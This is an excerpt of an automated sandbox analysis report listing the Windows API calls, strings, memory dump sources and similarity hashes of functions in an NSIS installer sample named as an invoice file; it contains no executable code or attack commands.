                                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                                          • Opcode ID: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
                                                                                                                                                                                                                          • Instruction ID: 9003099e8900d80eaa65f9bf21adae6f43ee9946aaa6f9d478ae9c17af360c06
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6216F72801118BBCF216FA5CE49D9E7F79EF09364F24423AF550762E0CB794E419B98
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404B43
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                          • String ID: %u.%u%s%s$(7B
                                                                                                                                                                                                                          • API String ID: 3540041739-1320723960
                                                                                                                                                                                                                          • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                                                                                                                                                                                          • Instruction ID: 8555a1dc09e6b234f76c08cd80d60a8511de1cbf1cdbca66d7a603e4fd23a7b2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E911EB736441283BDB0095AD9C45F9E3298DB85378F150237FA26F71D1DA79D82286EC
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp$C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll
                                                                                                                                                                                                                          • API String ID: 3109718747-717743250
                                                                                                                                                                                                                          • Opcode ID: bb355eb68794bd2602c597a740da7e4d176c02171e7b39124c1bbb2a5b8fb8b9
                                                                                                                                                                                                                          • Instruction ID: 4789cac02ba757069cd1743e95fa376523a080456913a55bd7acca95e4ec0b97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb355eb68794bd2602c597a740da7e4d176c02171e7b39124c1bbb2a5b8fb8b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA11E772A01204BADB10AFB18F4EE9E32659F54355F20403BF502F65C1DAFC8E51576E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                          • Opcode ID: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                                                                                                                                                                                          • Instruction ID: b9f5b7c8593eadded22e2ca3cbb8d83d08b5e31647f9888e60cfbaa55d101d4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66116A71504119FFEF10AF90DF8CEAE3B79FB14384B10007AF905E11A0D7B58E55AA69
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1148316912-0
                                                                                                                                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                          • Opcode ID: e9a49c003a36b0eb28a273a175e07ec8c4f33fa7e287ce0211e56fd96ac5525b
                                                                                                                                                                                                                          • Instruction ID: c287ee2e14a47dfcdc45124cadc9b4dd0eb33b5564dd8f2f51e592e83ba53e14
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9a49c003a36b0eb28a273a175e07ec8c4f33fa7e287ce0211e56fd96ac5525b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33F0E172600504AFD701DBE4DE88CEEBBBDEB48311B104476F541F51A1CA749D018B38
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401D59
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401DD1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                                                          • Opcode ID: 020d429652f6eb968a81cc61bdee73d82fb2a6d644655b906a561d6cebbfb8f5
                                                                                                                                                                                                                          • Instruction ID: 9e8fd183d3d9d3ef172346538d4b27734d94fdc92d2c471f4f64b2fa811a60c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020d429652f6eb968a81cc61bdee73d82fb2a6d644655b906a561d6cebbfb8f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F601A271544641EFEB016BB0AF4AF9A3F75BB65301F104579F152B61E2CA7C0006AB2D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                          • Opcode ID: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
                                                                                                                                                                                                                          • Instruction ID: 9ab6cbc1baff8286944736a18d7265b6422843b7a732a624d4201333bc7942cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2219071940209BEEF01AFB5CE4AABE7B75EF44744F10403EFA01B61D1D6B88A409B69
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30, 4#w.#w,?,77232EE0,0040598F,?,77233420,77232EE0,00000000), ref: 00405BEB
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30, 4#w.#w,?,77232EE0,0040598F,?,77233420,77232EE0,00000000), ref: 00405C93
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30, 4#w.#w,?,77232EE0,0040598F,?,77233420,77232EE0), ref: 00405CA3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                          • String ID: 4#w.#w$0_B
                                                                                                                                                                                                                          • API String ID: 3248276644-2230118208
                                                                                                                                                                                                                          • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                                                                                                                                                                                          • Instruction ID: 790be11e20efdccda9c73cacd4945748764c6204d4d0b11914a12a4c94a1ccfd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F0F925108F6515F62233790D05EAF2554CF82394755067FF891B12D1DB3C9D938C7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00406075
                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00406096
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 004060B9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                                          • API String ID: 3677997916-1824292864
                                                                                                                                                                                                                          • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                                                                                                          • Instruction ID: 0186f18981595c0b19feb364ea02d5f95392918b8fa258a18f8687652683a575
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4501483115020AEADF21CF66ED08E9B3BA8EF84390B01402AF845D2220D735D964DBA5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B38
                                                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B42
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405B54
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B32
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                          • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                                                                                                                                                          • Instruction ID: 1c34604f245f66d13fb295c2dca74b2082213948d97efa3850964b8affffb698
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57D05E31101934AAC2116B448C04DDB73AC9E46304341442AF201B70A6C778695286FD
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038E7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038FB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp, xrefs: 0040390B
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DA
                                                                                                                                                                                                                          Memory Dump Source
